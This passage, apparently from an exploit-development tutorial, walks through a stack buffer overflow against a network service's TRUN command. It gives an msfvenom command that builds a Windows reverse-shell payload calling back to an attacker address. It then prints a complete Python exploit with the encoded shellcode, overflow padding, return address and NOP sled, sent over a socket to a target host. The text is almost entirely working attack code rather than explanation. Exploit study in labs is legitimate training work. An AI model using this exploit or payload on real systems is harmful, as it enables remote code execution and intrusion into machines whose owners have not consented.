Inorder to generate a shellcode, we are again going to use a metasploit powered tool called msfvenom
Copy $ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.105 LPORT=1111 EXITFUNC=thread -f c -a x86 -b "\0x00" > payload
Copy #!/usr/bin/python
import sys, socket
overflow = ("\xbf\xe1\xed\x78\xbb\xdd\xc2\xd9\x74\x24\xf4\x5d\x2b\xc9"
"\xb1\x52\x83\xed\xfc\x31\x7d\x0e\x03\x9c\xe3\x9a\x4e\xa2"
"\x14\xd8\xb1\x5a\xe5\xbd\x38\xbf\xd4\xfd\x5f\xb4\x47\xce"
"\x14\x98\x6b\xa5\x79\x08\xff\xcb\x55\x3f\x48\x61\x80\x0e"
"\x49\xda\xf0\x11\xc9\x21\x25\xf1\xf0\xe9\x38\xf0\x35\x17"
"\xb0\xa0\xee\x53\x67\x54\x9a\x2e\xb4\xdf\xd0\xbf\xbc\x3c"
"\xa0\xbe\xed\x93\xba\x98\x2d\x12\x6e\x91\x67\x0c\x73\x9c"
"\x3e\xa7\x47\x6a\xc1\x61\x96\x93\x6e\x4c\x16\x66\x6e\x89"
"\x91\x99\x05\xe3\xe1\x24\x1e\x30\x9b\xf2\xab\xa2\x3b\x70"
"\x0b\x0e\xbd\x55\xca\xc5\xb1\x12\x98\x81\xd5\xa5\x4d\xba"
"\xe2\x2e\x70\x6c\x63\x74\x57\xa8\x2f\x2e\xf6\xe9\x95\x81"
"\x07\xe9\x75\x7d\xa2\x62\x9b\x6a\xdf\x29\xf4\x5f\xd2\xd1"
"\x04\xc8\x65\xa2\x36\x57\xde\x2c\x7b\x10\xf8\xab\x7c\x0b"
"\xbc\x23\x83\xb4\xbd\x6a\x40\xe0\xed\x04\x61\x89\x65\xd4"
"\x8e\x5c\x29\x84\x20\x0f\x8a\x74\x81\xff\x62\x9e\x0e\xdf"
"\x93\xa1\xc4\x48\x39\x58\x8f\xb6\x16\x62\x26\x5f\x65\x62"
"\xb9\x24\xe0\x84\xd3\x4a\xa5\x1f\x4c\xf2\xec\xeb\xed\xfb"
"\x3a\x96\x2e\x77\xc9\x67\xe0\x70\xa4\x7b\x95\x70\xf3\x21"
"\x30\x8e\x29\x4d\xde\x1d\xb6\x8d\xa9\x3d\x61\xda\xfe\xf0"
"\x78\x8e\x12\xaa\xd2\xac\xee\x2a\x1c\x74\x35\x8f\xa3\x75"
"\xb8\xab\x87\x65\x04\x33\x8c\xd1\xd8\x62\x5a\x8f\x9e\xdc"
"\x2c\x79\x49\xb2\xe6\xed\x0c\xf8\x38\x6b\x11\xd5\xce\x93"
"\xa0\x80\x96\xac\x0d\x45\x1f\xd5\x73\xf5\xe0\x0c\x30\x15"
"\x03\x84\x4d\xbe\x9a\x4d\xec\xa3\x1c\xb8\x33\xda\x9e\x48"
"\xcc\x19\xbe\x39\xc9\x66\x78\xd2\xa3\xf7\xed\xd4\x10\xf7"
"\x27")
shellcode = "A" * 2003 + "\xaf\x11\x50\x62" + "\x90" * 32 + overflow
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.0.104',9999))
s.send(('TRUN /.:/' + shellcode))
s.close()
except:
print("Error !")
sys.exit() 